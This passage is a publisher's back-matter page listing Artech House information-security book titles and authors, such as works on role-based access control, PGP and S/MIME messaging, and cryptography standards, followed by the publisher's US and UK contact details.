Privacy Protection and Computer Forensics, Second Edition,
Michael A. Caloyannides
Role-Based Access Control, Second Edition, David F. Ferraiolo,
D. Richard Kuhn, and Ramaswamy Chandramouli
Secure Messaging with PGP and S/MIME, Rolf Oppliger
Securing Information and Communications Systems: Principles,
Technologies and Applications, Javier Lopez, Steven Furnell,
Sokratis Katsikas, and Ahmed Patel
Security Fundamentals for E-Commerce, Vesna Hassler
Security Technologies for the World Wide Web, Second Edition,
Rolf Oppliger
Techniques and Applications of Digital Watermarking and Content
Protection, Michael Arnold, Martin Schmucker, and
Stephen D. Wolthusen
User’s Guide to Cryptography and Standards, Alexander W. Dent
and Chris J. Mitchell

For further information on these and other Artech House titles, including previously
considered out-of-print books now available through our In-Print-Forever® (IPF®)
program, contact:

Artech House
685 Canton Street
Norwood, MA 02062
Phone: 781-769-9750
Fax: 781-769-6334
e-mail: [email protected]

Artech House
16 Sussex Street
London SW1V HRW UK
Phone: +44 (0)20 7596-8750
Fax: +44 (0)20 7630-0166
e-mail: [email protected]

Find us on the World Wide Web at: www.artechhouse.com
